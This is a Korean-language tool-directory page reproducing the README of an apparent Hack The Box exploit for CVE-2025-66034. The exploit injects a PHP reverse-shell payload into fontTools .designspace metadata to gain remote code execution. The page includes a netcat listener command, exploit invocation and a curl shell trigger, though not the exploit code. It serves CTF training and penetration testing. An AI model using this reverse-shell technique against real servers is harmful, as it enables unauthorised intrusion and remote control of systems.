Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-66034-htb-ctf — VariaType HTB 머신을 위한 익스플로잇으로, fontTools의 XML 인젝션을 악용하여 .designspace 메타데이터 내 PHP 리버스 셸 페이로드를 통해 RCE를 달성합니다. | Kitploit
도구/GitHubGitHub/jwsly12/cve-2025-66034-htb-ctf
Payload GenerationExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubjwsly12/cve-2025-66034-htb-ctf

CVE-2025-66034-htb-ctf

VariaType HTB 머신을 위한 익스플로잇으로, fontTools의 XML 인젝션을 악용하여 .designspace 메타데이터 내 PHP 리버스 셸 페이로드를 통해 RCE를 달성합니다.

저장소 보기
1235개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-66034-htb-ctf

VariaType 가변 폰트 생성기 익스플로잇

이 저장소는 Hack The Box의 VariaType 머신을 위한 특화된 익스플로잇을 포함하고 있습니다. 이 익스플로잇은 fontTools 라이브러리 또는 웹 애플리케이션이 .designspace XML 파일과 메타데이터 보간(interpolation)을 처리하는 방식의 취약점을 이용하여 **원격 코드 실행(RCE)**을 달성합니다.

📝 설명

취약점은 폰트 생성 과정에 존재합니다. 악성 designspace 파일을 조작하여 폰트의 메타데이터(특히 <labelname> 필드)에 PHP 리버스 셸 페이로드를 주입할 수 있습니다. 서버가 이 파일들을 처리하여 가변 폰트를 생성할 때, 출력물을 사용자가 정의한 경로에 쓰기 때문에 웹루트에 .php 셸을 배치할 수 있습니다.

🛠️ 기능

  • 자동 폰트 생성: fontTools를 사용하여 유효한 source-light.ttf 및 source-regular.ttf 마스터 폰트를 생성합니다.
  • XML 주입: CDATA로 감싸진 PHP 페이로드가 포함된 악성 designspace 파일을 생성합니다.
  • 경로 탐색/임의 파일 쓰기: 결과 "폰트"를 공개 디렉토리에 .php 파일로 저장하려고 시도합니다.
  • 랜덤화: 충돌을 피하기 위해 고유한 셸 이름을 생성합니다.

🚀 요구 사항

Python 3와 다음 라이브러리가 설치되어 있어야 합니다:

root@kitploit:~
pip install fontTools requests

💻 사용법

1. 리스너 시작

로컬 머신(또는 Pwnbox)에서 Netcat 리스너를 시작하세요:

root@kitploit:~
nc -lvnp 4444

2. 익스플로잇 실행

HTB VPN IP와 리스너 포트를 제공하여 스크립트를 실행하세요:

root@kitploit:~
python3 exploit.py --ip <YOUR_IP> --port 4444

3. 셸 트리거

업로드가 200 OK를 반환하면(또는 오류 전에 처리가 발생할 경우 500이 반환되기도 함), 스크립트가 파일명을 제공합니다. curl 또는 브라우저로 접근하세요:

root@kitploit:~
curl http://portal.variatype.htb/shell_xxxxxx.php

⚙️ 인수

⚠️ 면책 조항

이 스크립트는 교육 목적과 승인된 침투 테스트만을 위해 만들어졌습니다. 사전 승인 없이 대상에 접근하거나 공격하는 것은 불법입니다.


이 README 사용 방법:

  1. 위 내용을 스크립트와 같은 폴더에 README.md로 저장하세요.
  2. 스크립트 이름이 exploit.py인지 확인하거나 위 명령어의 파일명을 업데이트하세요.
도구 다운로드
인수설명기본값
--ip리스너 IP (VPN)필수
--port리스너 포트필수
--path셸의 대상 경로/var/www/portal.variatype.htb/public
--url업로드 엔드포인트http://variatype.htb/tools/.../process